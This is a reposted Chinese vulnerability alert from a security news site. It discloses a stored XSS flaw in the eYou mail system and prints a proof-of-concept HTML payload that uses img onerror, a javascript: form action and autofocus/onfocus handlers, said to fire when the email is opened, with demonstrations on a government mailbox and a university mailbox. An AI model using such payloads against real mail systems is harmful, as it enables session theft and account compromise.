栏目导航: 首页 > 漏洞预警 > 程序漏洞 > 内容

eYou邮件系统邮件正文存储型XSS(HTML5特性并需点击)

www.hx99.net    时间: 2015-03-23    阅读: 次     整理: 华西安全网

 由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。


测试代码:

<!--[if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>发送后打开,效果如图:

某党政机关邮箱:
 

QQ图片eyou120150121142357.jpg


 

QQ图片eyou220150121142545.jpg



某院校邮箱:

QQ图片eyou320150121142724.jpg

漏洞证明:

由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。

测试代码:

<!--[if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>发送后打开,效果如图:

某党政机关邮箱:
 

QQ图片eyou120150121142357.jpg


 

QQ图片eyou220150121142545.jpg



某院校邮箱:

QQ图片eyou320150121142724.jpg


    转载分享请注明原文地址(Yulong's Blog nmap nmap.cc):http://nmap.cc/jsjl/197.html

本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭